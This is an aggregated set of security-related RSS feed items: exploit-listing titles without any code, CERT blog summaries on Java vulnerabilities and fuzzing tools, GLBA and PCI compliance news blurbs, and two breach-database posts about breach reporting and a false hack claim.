==> web - CKEditor 4.0.1 CSRF / XSS / Path Disclosure Vulnerabilities

http://www.1337day.com/rss

==> web - vBulletin 5.0.0 Beta Release 0day Exploit

http://www.1337day.com/rss

==> [shellcode] - Linux/x86 Remote Port forwarding 87 bytes

http://www.1337day.com/rss

==> [shellcode] - Linux/x86 Force Reboot shellcode 36 bytes

http://www.1337day.com/rss

==> web - spidaVote 1.3 (id) SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - RTTucson Quotations Database Script Sql injection Vulnerability

http://www.1337day.com/rss

==> web - Piwigo 2.4.6 Arbitrary File Read / Delete Vulnerabilities

http://www.1337day.com/rss

==> web - PHP-Fusion CMS 7.02.05 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - ZeroClipboard XSS vulnerabilities

http://www.1337day.com/rss

==> web - Smoke Loader LFI / File Deletion Vulnerabilities

http://www.1337day.com/rss

==> web - Netgear DGN2200B - Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Cometchat Application - Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Scripts Genie Pet Rate Pro SQL injection Vulnerability

http://www.1337day.com/rss

==> web - Scripts Genie Hot Scripts Clone SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - VLC 2.0.5 (.bmp) Heap Overflow PoC

http://www.1337day.com/rss

==> web - Scripts Genie Gallery Personals SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Scripts Genie Domain Trader SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Scripts Genie Games Site Script SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Scripts Genie Top Sites SQL Injection Vulnerability

http://www.1337day.com/rss

==> local - Apple iPhone iOS Default SSH Password Exploit (.py)

http://www.1337day.com/rss

==> web - ARASTAR Sql Injection Vulnerability

http://www.1337day.com/rss

==> web - Ajax File Manager Remote Code Execution Exploit

http://www.1337day.com/rss

==> web - A4tech Bloody2 Mouse Activation

http://www.1337day.com/rss

==> web - Dimofinf cms version 3.0.0 Sql Injection Vulnerability

http://www.1337day.com/rss

==> remote - SAP Netweaver Message Server Buffer Overflow Vulnerability

http://www.1337day.com/rss

==> web - Sonar 3.4.1 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> remote - xMatters Alarmpoint BoF-0day

http://www.1337day.com/rss

==> remote - EChat Server 3.1 BoF-0day

http://www.1337day.com/rss

==> web - WiFilet v1.2 iPad iPhone - Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - PHP-Nuke module (League 2.4) XSS Vulnerability

http://www.1337day.com/rss

==> web - PHP-Nuke Module Nukequiz <= 2.0.0 SQL Injection Vulnerability

http://www.1337day.com/rss

==> Anatomy of Java Exploits

http://www.cert.org/blogs/vuls/rss.xml On behalf of the real author, my colleague David Svoboda (and a couple others who work on the CERT Secure Coding Initiative), here's a post analyzing recent Java exploits. Java was exploited recently and last August. The August exploit was patched by Oracle on August 30; this most recent exploit now also has a patch available. Strictly speaking, the vulnerabilities that permitted both exploits are independent; the current exploit attacked code that was unused by the August exploit. Nevertheless, these vulnerabilities were quite similar. This blog post examines the vulnerabilities that permitted Java to be exploited in each case, using the proof-of-concept code exploits that have been published for them in January 2013 and August 2012.

==> Java in Web Browser: Disable Now!

http://www.cert.org/blogs/vuls/rss.xml Hi, it's Will and Art here. We've been telling people to disable Java for years. In fact, the first version of the Securing Your Web Browser document from 2006 provided clear recommendations for disabling Java in web browsers. However, after investigating the Java 7 vulnerability from August, I realized that completely disabling Java in web browsers is not as simple as it should be. Luckily, Oracle has since added a new option in the Java control panel applet to disable Java in the browser. If you haven't already done so, now is the time to disable Java in the browser.

==> Forking and Joining Python Coroutines to Collect Coverage Data

http://www.cert.org/blogs/vuls/rss.xml In this post I'll explain how to expand on David Beazley's cobroadcast pattern by adding a join capability that can bring multiple forked coroutine paths back together. I'll apply this technique to create a modular Python script that uses gcov, readelf, and other common unix command line utilities to gather code coverage information for an application that is being tested. Along the way I'll use ImageMagick under Ubuntu 12.04 as a running example.

==> A Look Inside CERT Fuzzing Tools

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Allen Householder of the CERT Vulnerability Analysis team. If you've been following this blog for a while, you are probably familiar with our fuzzing tools: Dranzer, the CERT Basic Fuzzing Framework (BFF), and the CERT Failure Observation Engine (FOE). While creating tools that can find and analyze vulnerabilities makes up a significant portion of our work in the CERT Vulnerability Analysis team, our focus is on developing and communicating the knowledge we've built into those systems. To that end, we recently published a pair of reports that describe a few of the heuristics and algorithms implemented in the BFF and FOE fuzzing tools. We briefly mentioned these techniques in the release announcements for the tools, but did not describe how they work in detail. Abstracts and links to the reports can be found below.

==> Updates to CERT Fuzzing Tools (BFF 2.6 & FOE 2.0.1)

http://www.cert.org/blogs/vuls/rss.xml Hi everybody. Allen Householder from the CERT Vulnerability Analysis team here, back with another installment of "What's new in CERT's fuzzing frameworks?" Today we're announcing the release of updates of both our fuzzing tools, the CERT Basic Fuzzing Framework (BFF) version 2.6 and the CERT Failure Observation Engine (FOE) version 2.0.1. The remainder of this post describes the changes in more detail.

==> Java 7 Attack Vectors, Oh My!

http://www.cert.org/blogs/vuls/rss.xml While researching how to successfully mitigate the recent Java 7 vulnerability (VU#636312, CVE-2012-4681), we (and by "we" I mean "Will Dormann") found quite a mess. In the midst of discussion about exploit activity and the out-of-cycle update from Oracle, I'd like to call attention to a couple other important points.

==> The Report "Network Profiling Using Flow" Released

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Austin Whisnant of the CERT Network Situational Awareness Team (NetSA). After a long time in the making, NetSA has published an SEI technical report on how to inventory assets on a network using network flow data. Knowing what assets are on your network, especially those visible to outsiders, is an important step in gaining network situational awareness.

==> Java Security Manager Bypass Vulnerability

http://www.cert.org/blogs/vuls/rss.xml Last Sunday, another major Java vulnerability (VU#636312) was reported. Until an official update is available, we strongly recommend disabling the Java 7 plug-in for web browsers.

==> CERT Failure Observation Engine 2.0 Released

http://www.cert.org/blogs/vuls/rss.xml Hi folks, Allen Householder from the CERT Vulnerability Analysis team here. Back in April, we released version 1.0 of the CERT Failure Observation Engine (FOE), our fuzzing framework for Windows. Today we're announcing the release of FOE version 2.0. (Here's the download.) Although it has only been a few months since we announced FOE 1.0, our development cycle is such that FOE 2.0 actually reflects nearly a year of additional improvements over the 1.0 release. Our main focus in developing FOE 2.0 was to apply what we learned from creating the CERT Basic Fuzzing Framework version 2.5 for Linux and OS X to improve our fuzzing capabilities on Windows. We are gradually converging our code bases for BFF and FOE to simplify maintenance and the incorporation of new features. We're not quite there yet, but FOE 2.0 reflects a significant step in that direction. Read on for more details.

==> Vulnerability Data Archive

http://www.cert.org/blogs/vuls/rss.xml With the hope that someone finds the data useful, we're publishing an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database.

==> CERT Basic Fuzzing Framework 2.5 Released

http://www.cert.org/blogs/vuls/rss.xml Hi folks, Allen Householder here. In addition to the recent introduction of our new Failure Observation Engine (FOE) fuzzing framework for Windows and Linux Triage Tools, we have updated the CERT Basic Fuzzing Framework (BFF) to version 2.5. This post highlights the significant changes.

==> CERT Linux Triage Tools 1.0 Released

http://www.cert.org/blogs/vuls/rss.xml As part of the vulnerability discovery work at CERT, we have developed a GNU Debugger (GDB) extension called "exploitable" that classifies Linux application bugs by severity. Version 1.0 of the extension is available for public download here. This blog post contains an overview of the extension and how it works.

==> Vulnerability Severity Using CVSS

http://www.cert.org/blogs/vuls/rss.xml If you analyze, manage, publish, or otherwise work with software vulnerabilities, hopefully you've come across the Common Vulnerability Scoring System (CVSS). I'm happy to announce that US-CERT Vulnerability Notes now provide CVSS metrics.

==> Detecting Abnormal Technology Systems Behavior

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Upgraded Version of WebSearch Launched by DocuLex

http://www.compliancehome.com/rss/resources-GLBA.xml WebSearch version 4.2, which boasts additional features such as customized business processes and collaborative workflow capability, has been introduced by DocuLex, a content management software provider. WebSearch version 4.2 is a product of the DocuLex Archive Studio that helps organizations make decisions by automating any business process through a systematic workflow.

==> Model Consumer Privacy Notice Online Form Builder Released by Federal Regulators

http://www.compliancehome.com/rss/resources-GLBA.xml An Online Form Builder that financial institutions can download and use to develop and print customized versions of a model consumer privacy notice has been released by eight federal regulators, including the Federal Reserve Board and the Federal Trade Commission. The form builder, based on the model form regulation published in the Federal Register on Dec. 1, 2009, under the Gramm-Leach-Bliley Act (GLBA), is available with several options. The form builder will guide an institution to select the version of the model form that fits its practices, such as whether the institution provides an opt-out for consumers.

==> ACA-Supported Gramm-Leach-Bliley Reforms Passed by U.S. House

http://www.compliancehome.com/rss/resources-GLBA.xml The U.S. House of Representatives passed H.R. 3506 by voice vote on the Suspension Calendar on April 14, 2010, creating a positive policy step forward for our industry. H.R. 3506, which was sponsored by Representatives Erik Paulsen (R-MN) and Dennis Moore (D-KS), removes burdensome requirements under the Gramm-Leach-Bliley Act (GLBA).

==> Advisers must know the ways to protect clients' privacy

http://www.compliancehome.com/rss/resources-GLBA.xml As more and more personal financial information is transmitted online and stored electronically, concerns about privacy and data protection have grown. For financial advisers, privacy issues will only become more important as technology and new types of media proliferate.

==> Reasons Why the U.S. Won't Be Prepared For Cyberwar by Rockefeller-Snowe's Regulations

http://www.compliancehome.com/rss/resources-GLBA.xml Sens. Jay Rockefeller (D-W. Va.) and Olympia Snowe (R-Maine) have formulated a new cybersecurity bill that they described in Friday's Wall Street Journal. (Use Google News to get to the full article.) The bill as proposed will be very disruptive to the operations of every business and will do essentially nothing to prepare the U.S. for cyberwar.

==> GLBA Privacy Notices At Last Get Overhauled

http://www.compliancehome.com/rss/resources-GLBA.xml On November 17, 2009, the Federal Trade Commission (FTC), along with other federal regulators (Federal Deposit Insurance Corporation, Federal Reserve Board, Office of the Comptroller of the Currency, Office of Thrift Supervision, National Credit Union Administration, Commodity Futures Trading Commission, and Securities and Exchange Commission, collectively referred to as the Agencies), adopted final Model Privacy Notice forms for compliance with the Gramm-Leach-Bliley Act (GLBA) and its implementing regulation, the FTC's Financial Privacy Rule. The Model Privacy Notice replaces the Sample Clauses, which appear in Appendix B to the Privacy Rule and, as such, now provides the safe harbor for compliance.

==> Cloud Computing Backup? Significant Questions

http://www.compliancehome.com/rss/resources-GLBA.xml The quick evolution and maturity of cloud storage providers creates a new opportunity for managed service providers to offer cloud backup services. Backup to the cloud can provide a compelling cost advantage for SMB and SME customers and it opens up a new model for VARs and MSPs to profit with cloud-based backup services.

==> Effective Workflow for Fixing Network Vulnerabilities & Policy Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml This webcast outlines the eight workflow processes that create an effective vulnerability management solution to ensure security and document compliance. Discover how the right software-as-a-service (SaaS) solution automates these processes for fast, cost-effective remediation and policy compliance. View this webcast and learn about an effective remediation plan that provides continuous protection from network vulnerabilities and helps comply with regulations such as PCI, GLBA and HIPAA.

==> New Degausser Introduced by SEM

http://www.compliancehome.com/rss/resources-GLBA.xml The Model EMP001 Eliminator Hard Drive and Magnetic Tape Degausser is being introduced by Security Engineered Machinery (SEM) as its most recent product for degaussing hard drives. The electromagnetic-pulse degausser permanently erases data from computer hard drives, data tapes, and other magnetic media. The EMP001 is on the U.S. National Security Agency's Evaluated Products List, complies with Department of Defense requirements for destroying classified information on magnetic media, and exceeds the requirements of many national and international legislative mandates (FACTA, HIPAA, GLB, DPA, etc.) for the destruction of confidential/sensitive data.

==> Is Compliance in the Cloud Achievable

http://www.compliancehome.com/rss/resources-GLBA.xml There is no doubt that cloud computing is dominating today's IT conversation among C-level security executives. Whether it's due to the compelling cost saving possibilities in a tough economy, or because of perceived advantages in provisioning flexibility, auto-scaling, and on-demand computing, CSOs are probing the capabilities, costs and restrictions of the cloud. At the same time, security and compliance concerns are at the forefront of issues potentially holding large enterprises back from capitalizing on the benefits that cloud computing has to offer.

==> Harmonizing Controls to Reduce Your Cost of Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Mounting regulations across the globe have increased the cost and burden on organizations. The high cost is especially felt by organizations which must adhere to multiple requirements - 75 percent of organizations must comply with two or more regulations and corresponding audits and more than 40 percent must comply with three or more regulations.

==> Federal and State Data Regulations Not to be Overlooked

http://www.compliancehome.com/rss/resources-GLBA.xml Tracking new regulations and compliance rulings from federal and state government can be dizzying; they include FRCP, HIPAA, GLB, and more. But now more than ever, the government expects all businesses to comply, not just large corporations. Today, every company is responsible for its data and for securing its customers' information, no matter how much it costs to do so. In today's litigious business world, the possibility of being dragged into a lawsuit is very real, and if that happens, you will likely need to make your information available to the process. And woe to the company that cannot comply with basic regulations, because a judge will not accept that you thought those requirements applied only to the big companies.

==> Trailing Ground: Gramm-Leach-Bliley and the Future of Banking

http://www.compliancehome.com/rss/resources-GLBA.xml The debate in Washington over financial regulation has probably puzzled most of the observers by references to the GLBA as a cause of the financial crisis. At the time of its adoption, the GLBA was hailed as a forward-looking effort to bring new flexibility and change to the banking industry. As described by John LaFalce, then the ranking Democrat on the House Financial Services Committee,

==> Payment System Product Codes to be Evaluated by PCATS

http://www.compliancehome.com/rss/resources-GLBA.xml A survey to identify the use of PCATS payment product codes within the convenience store industry has been created by the Petroleum Convenience Alliance for Technology Standards (PCATS). In addition to measuring the number of merchant fueling locations that have implemented PCATS standard payment product codes at their point of sale (POS), the survey may also help identify additional items that need to be added to the current industry code list.

==> IBM's Acquisition Of Guardium Created a Buzz in Security market

http://www.compliancehome.com/rss/resources-GLBA.xml IBM's acquisition of database activity monitoring (DAM) vendor Guardium has created a lot of buzz in the security industry. This is the first major acquisition in the database security market, the first time a large company has bet on DAM technology, and if the rumored sales price is accurate, then it suggests IBM paid a premium. And given the value this product can provide to IBM customers, it looks like a good investment.

==> A Combined Security Solution for Governance Portal

http://www.compliancehome.com/rss/resources-GLBA.xml A worldwide business consulting and internal audit firm, Protiviti Inc., has introduced the first product in its new Governance Portal for Information Technology series. The product is a security solution directed at mitigating data security risks and avoiding costly data breaches and reputation damage.

==> Analyst Webinar on Risk and Compliance Management: Learning from Leaders and Steps You Can Take

http://www.compliancehome.com/rss/resources-GLBA.xml Join Forrester Research analyst Chris McClean to learn what leading companies are doing for effective risk and compliance management and the steps you can take today. Risk managers in all industries are grappling with the problems of performing real-time risk measurement and mitigation, and the added complexity of stringent compliance and regulatory requirements such as SOX, FCPA, HIPAA, AML, GLBA, FERC, NERC and many more adds a further layer of challenges. As a result, companies are looking to systematically identify, measure, prioritize and respond to all types of risk in the business, while ensuring compliance with federal and state regulations.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes; go beyond intrusion detection and prevention to a positive, proactive security model that protects against new email and web-borne attacks; safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information; and implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Satellite Technology Used by Glacier Bay National Park Rangers to Help Tousled Whales

http://www.compliancehome.com/rss/resources-GLBA.xml Rangers in Glacier Bay National Park respond not only to human visitors in trouble, but also to marine life that needs help. A recent case of a humpback whale that became entangled in a polyester line demonstrates not only the quick response of park rangers, but also how satellite technology can play a role in saving whales.

==> 'Managing the Cloud: Are You Comfortable with Where Your Data Sleeps at Night?'

http://www.compliancehome.com/rss/resources-GLBA.xml Why is cloud computing relevant today from an economic, business and technology standpoint? What are some potential benefits and pitfalls of moving to the cloud? What should you look for in a cloud computing provider to ensure the security of your data and applications? In an October 8 interview from Times Square, Sam Gross, vice president, Global Information Technology Outsourcing Solutions, Unisys Corporation, will answer these questions and more. Sam will talk about how the economy is accelerating a tectonic shift in IT and how it supports the business. He will also discuss how to transform a traditional data center that is inflexible and costly into a cloud computing environment that is secure, virtualized and automated, and that requires less investment.

==> Sipera Secure Live Communications Mobility System Made Available by era Systems

http://www.compliancehome.com/rss/resources-GLBA.xml Sipera SLiC offers business-ready smartphone VoIP and unified communications (UC). This latest offering delivers enterprise-class communications privacy and security for VoIP and UC on smartphones. Additionally, the company's system enables smartphone VoIP to include smart-card authentication for accessing enterprise resources. Company officials said that this provides unparalleled access control and communications privacy.

==> The Wonderful Triangle of IT Security

http://www.compliancehome.com/rss/resources-GLBA.xml The myths of the CIA triad: have you ever considered taking a role as the most senior person for information security at a large corporation? Then you must be prepared to understand the key principles of information security, and how they really apply to life and business.

==> Sensitive Data to be Sealed by Solid Wireless Security Policies (Part 3)

http://www.compliancehome.com/rss/resources-GLBA.xml With smartphones gaining traction in the consumer world, it's easy to forget that handsets are simply mini computers that could contain sensitive data about business contacts and inter-office electronic communication. In addition to putting in place a procurement policy that includes checks and balances for who gets what type of wireless device and plan, as well as a usage policy to make sure employees aren't overusing mobile services for personal use, implementing a solid security policy is also essential, said Pankaj "PJ" Gupta, founder and CEO of Amtel, a company that helps enterprises rein in wireless management expenses and improve productivity.

==> Updated AMU Kit Offered to FaceTime's Unified Security Gateway 3.0

http://www.compliancehome.com/rss/resources-GLBA.xml A purveyor of applications designed to promote the secure use of Web 2.0 and unified communications in the commercial segment, FaceTime Communications, announced the commercial launch of its Augment, Migrate and Update, or AMU, kit. The kit is devised for enterprises that are on the brink of expensive upgrades needed to maintain compliance with enterprise security and control standards, which are essential to manage the changing face of the Internet.

==> Former Chairman of the Federal Reserve Wants to Bring Back 1933 Glass-Steagall Act

http://www.compliancehome.com/rss/resources-GLBA.xml The former Chairman of the Federal Reserve [1979-1987], Paul Volcker, has advised the Obama Administration to bring back the 1933 Glass-Steagall Act [SGA]. The Glass-Steagall Act was repealed in 1999 and replaced with the Gramm-Leach-Bliley Act [GLBA]. The GLBA removed restrictions on commercial banks and investment banks, allowing them gross latitude in activities and services. (Reem Heakel, 2009)

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution - Vendor Webcast

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. View this webcast for an overview of each regulation. Also, gain an understanding of the capabilities an organization must have in place to address these requirements.

==> Data Security should be ensured by the Strategy

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past few years, with the rise in incidents of identity theft, many organizations are rightfully concerned about keeping their customers' data private. While the financial service industry has been regulated since the late '90s by the federal government, other companies would be wise to follow its lead. For some years now, financial service companies have had to comply with the provisions of the oft-maligned Gramm-Leach-Bliley Act. Among other things, GLBA calls for a process that begins with an assessment of an organization's information systems, followed by development of a security strategy, implementation of the strategy and, finally, ongoing monitoring.

==> FDA's Growing Role Regulating Health 2.0, Health IT

http://www.compliancehome.com/rss/resources-GLBA.xml That federal regulation is part of the deal is well known to many who are involved in the world of health IT. Issues of health information privacy have been subject to an array of federal and state laws for decades. HIPAA, the Federal Privacy Act, laws governing Medicaid, Medicare, the Veterans Health Administration, funds used for the treatment of mental illness, sexually transmitted infections and on and on all have privacy provisions. There is a similar regulatory scheme for data security, again including HIPAA, the Gramm-Leach-Bliley Act and other laws.

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. These regulations require technical safeguards to protect or guarantee the veracity of critical information. With SOX, it's for public companies to guarantee accurate financial accounting. GLBA protects the personal financial information of an organization's customers. And HIPAA protects and guarantees the privacy of an individual's personal health information (PHI). What all three have in common is the requirement for specific IT controls. Learn more about these regulations and how to automate manual processes with an integrated change auditing and configuration control solution.

==> Severance of Duties in Virtualized Environments

http://www.compliancehome.com/rss/resources-GLBA.xml With Virtualization we have moved a step closer to the world of Star Trek. Think back to episodes of The Next Generation where Geordi was able to control the functions of the entire ship through a single touch-screen interface. He was able to reconfigure electrical, mechanical and propulsion systems without needing anyone else or additional authorization. The only thing to prevent him from doing something risky or damaging was the computer system itself.

==> Availability of OfficeScreen Complete Announced by ANXeBusiness Corp.

http://www.compliancehome.com/rss/resources-GLBA.xml A leading provider of networking and security managed services, ANXeBusiness Corp., announced the availability of OfficeScreen Complete, a fully managed security solution providing comprehensive protection from web-based threats, advanced remote access capabilities, and productivity enhancement tools. Built upon two powerful security technologies - ANX OfficeScreen and ANX PositivePro - OfficeScreen Complete combines an award-winning managed firewall, site-to-site VPN, URL filtering, and remote access technology into one hosted solution. Additionally, when supporting five or more users, OfficeScreen Complete can also include wireless access point security, traffic shaping, and Internet failover support.

==> Bank compliance laws need to be streamlined to really help consumers

http://www.compliancehome.com/rss/resources-GLBA.xml In today's environment, banks must devote a huge amount of time and resources, at great expense, to keeping up with the never-ending cascade of new laws and regulations and to staying in compliance with the myriad existing ones. Before Congress enacts legislation implementing the part of the administration's regulatory reform proposal that calls for the establishment of a new Consumer Financial Protection Agency, it should take a close look at the compliance burdens already heaped upon banks.

==> Vital Information Security and Compliance Activities for 2010

http://www.compliancehome.com/rss/resources-GLBA.xml It has always been a challenge for businesses and organizations of all sizes to manage the security of critical information. Even companies that invest in the latest security infrastructure and tools soon discover that these technology-based solutions are short-lived.

==> Data Loss Prevention not a solution

http://www.compliancehome.com/rss/resources-GLBA.xml One of the powerful tools that many organizations are using to prevent the unauthorized copying or transmission of confidential or personal data is Data Loss Prevention (DLP). Organizations spend a tremendous amount of money and time to set up firewalls and intrusion detection solutions to prevent attackers from the outside from gaining access to internal assets. However, what about the internal threat? A Web page, an e-mail with a client list, or personal data copied to a USB drive are all examples of data that can leave an organization unmonitored and undetected.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join this webinar to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes; go beyond intrusion detection and prevention to a positive, proactive security model that protects against new email and web-borne attacks; safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information; and implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Real-Life Log Management Challenges for Financial Institutions

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Email Security and Archiving - Clearer in the Cloud

http://www.compliancehome.com/rss/resources-GLBA.xml The time is NOW for businesses and organizations of all sizes to implement cloud computing solutions for email security and archiving. Cloud computing solutions are more effective than traditional, on-premise solutions, and at a fraction of the cost and IT resource requirements. Listen to this live TechRepublic Webcast, moderated by Steve Kovsky and featuring special guests Michael Osterman, President of Osterman Research, and Adam Swidler of Google. They present findings from the latest research comparing cloud solutions with on-premise solutions.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes; go beyond intrusion detection and prevention to a positive, proactive security model that protects against new email and web-borne attacks; safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information; and implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Generating grounds for identity theft

http://www.compliancehome.com/rss/resources-GLBA.xml The federal GLBA, HIPAA, FACTA and its Red Flags and Disposal Rules, state data breach notification laws, and hundreds of other federal and state laws and industry regulations like PCI-DSS are intended to protect the privacy and security of consumers' personally identifiable and financial information entrusted to businesses and other organizations. Many such regulations aim to prevent identity theft and privacy violations.

==> The Price of Not Complying With GLBA

http://www.compliancehome.com/rss/resources-GLBA.xml The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to create and maintain an information security program to protect customer information. This webcast highlights GLBA and Technology safeguards, the price of not complying, how to identify technology compliance areas, compliance policy and process - who implements and how, and Tripwire GLBA Product/Service offerings.

==> SAS 70 Certification Completed by CRG West

http://www.compliancehome.com/rss/resources-GLBA.xml A developer, manager and operator of data centers, CRG West, has completed SAS 70 Type II certification at the company's Boston and Chicago data centers. The company believes the completion of this certification process in Boston and Chicago has made the outsourced data center selection process more efficient for prospective customers from all industries.

==> CIO Strategies for Retention and Deletion of Email and Electronic Information

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past two years, major changes to the Federal Rules of Civil Procedure (FRCP) and the increase in state and federal compliance regulations have created new challenges for companies as they struggle to manage email retention and deletion policies. To successfully maintain compliance and protect their business in the event of litigation, companies must understand these changes. Implementing new strategies for email will enable organizations to effectively set and manage email retention and deletion policies, as well as provide robust search and e-Discovery capabilities to respond rapidly to litigation.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Using Email Encryption to Enforce Security Policies for PCI, GLBA & HIPAA Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Ensuring your organization complies with today's increasingly complex regulations and industry mandates around email and data security can be both a legal and technical mine field. First you need to understand what data should be protected. Then you need to determine who in your organization has access to that data and is sending it to people outside of the organization. You also need to invest in technology to enforce your compliance policies. It can be intimidating for any IT department. Hearing how your peers have tackled these challenges can help you plan your approach to finding a solution. Watch the webinar,

==> Email is Critical...and Out of Control!

http://www.compliancehome.com/rss/resources-GLBA.xml More than 75% of the average company's intellectual property is contained in email messages and their attachments. As a result, email has quickly become the file server of choice for most of us - and a headache for compliance managers. The value of unified information access to live and archived email via desktop or mobile device is becoming increasingly important for today's businesses - from end users to the board room, where compliance is an ongoing pain point.

==> The Top 10 Benefits of SaaS-enabled Email Management

http://www.compliancehome.com/rss/resources-GLBA.xml Email is indisputably the most important business application for most organizations. Yet, managing it has always been a no-win proposition. Add the pressure of fewer people and resources as well as shrinking budgets these days, and it seems that the pain of managing email can only get worse. But don't despair, there's a new breed of managed SaaS-enabled email services that are modular, reliable, and secure for virtually any type of business.

==> Knock, knock. Who's there? No one.

http://datalossdb.org/incident_highlights.rss As we mentioned in our last post, trying to contact and confirm organizations that have reportedly been breached can be time-consuming and frustrating. When that organization is a hospital and we cannot reach anyone or get a response, it's especially concerning. Yesterday, I tried to contact [Redacted] Hospital. I went to their site for contact info, but they had no phone directory or email directory by department or office. So I called their main number and asked for IT. I was sent to voicemail. I hung up, called back, and asked the operator to stay on the line until I got through to a person in IT or the Privacy Compliance Officer. Eventually, I heard a male voice, who told me that he was the "service desk." The "service desk" was not IT. I subsequently learned that they are an outsourced IT partner. I explained that the hospital had apparently suffered a hack via SQL injection and I could email him a link to the data so that IT could investigate and take action to secure the server better. I gave him my name, email address, and phone number, and told him that I was with the Open Security Foundation. He told me he didn't have an email address for me to email him the link, but that he would open a ticket. He had no email address to give me? Seriously? On the one hand, not accepting an emailed link from a stranger makes good security sense, but on the other hand, how could I send them data and details without an email address? I usually paste some dumped data into the body of the email with the link to the full paste. So now, not only could I not directly reach the responsible parties, I could not even send them any data to pursue. The service desk employee opened a ticket and sent me a copy of it. That was almost 24 hours ago.
The two individuals he directed the ticket to were the hospital's System Administrator and Technical Analyst, neither of whom has contacted me by email or phone, even though my contact details were in the support ticket. In this case, the data were dumped on the Internet at the beginning of December 2012, so maybe they know already, but since the data are still live and, in any event, they have no idea what data I called about, maybe they don't know. The data do not appear to be patient data, but they are personally identifiable information. And if those data were vulnerable, what other data might still be vulnerable? Another staff member from OSF also tried to reach them last night - through the hospital's on-site contact form. That form doesn't have a pull-down menu to direct the message to particular subjects or departments. It shouldn't be so difficult to contact the responsible party when there's been a breach. So here are some "best practices" recommendations for HIPAA-covered entities to add to their checklists:
1. Provide a dedicated phone number and email address to report privacy or security breaches and prominently post those contact details on the home page of your web site.
2. Ensure that the phone number and email address are monitored 24/7/365.
3. Establish a written policy that all such contacts or messages are to be acknowledged within 1 hour.
4. Follow up and let the individual who reported the problem know what steps you have taken.
5. If you use a contact form on your web site, have a pull-down menu for subjects, and have one of them be "Privacy or Security Concern."
Every hospital tells patients that they take the privacy and security of their information seriously. I wouldn't believe them if they don't respond to security alerts and make people jump through hoops just to try to inform them that they may have had a breach involving personal information.
And I certainly wouldn't believe any hospital that doesn't even return a phone call when you have left them a message that they may have a security problem with their public-facing server. Responsible hospitals should facilitate reporting privacy or data security concerns. So what has your organization done to facilitate reporting of breaches? /Dissent

==> Fool us once, shame on you. Fool us twice, we implement policies!

http://datalossdb.org/incident_highlights.rss It had all the makings of a sexy data breach story. An individual with the Twitter nick of @TibitXimer claimed to have exploited a vulnerability on Verizon's server and dumped about 300,000 records out of an estimated 3,000,000 customer records allegedly acquired. ZDNet trumpeted the headline, "Exclusive: Hacker nabs 3m Verizon customer records." They reported: "A hacker has posted around 300,000 database entries of Verizon customers to the Web, after exploiting a vulnerability in the cellular giant's network. The hacker, going by the name @TibitXimer on Twitter, told ZDNet earlier this evening that the hack was carried out earlier this year on July 12, which allowed him to gain root access to the server holding the customer data. Tibit gained access to a server with little difficulty after working with another hacker to identify the security flaw." The problem is that although none of it was true, @TibitXimer's claims and ZDNet's repetition of the claims were repeated all over the Internet. One day later, @TibitXimer was gone from Twitter and a more accurate version of the story started to emerge. In statements to other media outlets such as DataBreaches.net, The Next Web, and Forbes, Verizon spokesperson Alberto Canal explained that Verizon's systems had not been breached at all, there was no vulnerability exploited, no root access gained, and that the data dumped were old data from an incident a few months ago. To add insult to the reputation harm that Verizon could have suffered, the incident wasn't even Verizon's incident. It turned out that a third-party marketing firm that Canal did not name had accidentally leaked a sales lead list and the list had simply been copied and posted at the beginning of August. Most of the names on the list were not even Verizon customers, according to Canal. The same data were re-posted this week and claimed as a new hack. Not such a sexy story anymore, right?
